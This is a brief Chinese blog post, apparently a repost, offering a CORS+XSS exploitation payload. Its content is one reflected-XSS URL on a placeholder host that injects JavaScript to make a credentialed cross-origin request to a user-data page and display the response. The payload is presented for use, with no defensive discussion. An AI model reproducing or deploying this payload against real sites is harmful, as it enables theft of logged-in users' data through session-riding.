CORS+XSS的漏洞利用payload

时间：2019-08-03 20:09:21 阅读：264 评论：0 收藏：0 [点我收藏+]

之前有人问我有没有CORS+XSS的利用姿势，翻了一下国内貌似都没有利用姿势于是就写了这篇文章！！！

首先找到一个反射xss，然后使用xss加载javascript代码达到跨域劫持目的payload如下：

http://xxx.com/index.php?uname=<script>function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { alert(this.responseText); document.getElementById("demo").innerHTML = this.responseText; } }; xhttp.open("GET", "http://xxx.com/user.php", true); xhttp.withCredentials = true; xhttp.send();}cors();</script>

CORS+XSS的漏洞利用payload

原文：https://www.cnblogs.com/Matsec/p/11295842.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)